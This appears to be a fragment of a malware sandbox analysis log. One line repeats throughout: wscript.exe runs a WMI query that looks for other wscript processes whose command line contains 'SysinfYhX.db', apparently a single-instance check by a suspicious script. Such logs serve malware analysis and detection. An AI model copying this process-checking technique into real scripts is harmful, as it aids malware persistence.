Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
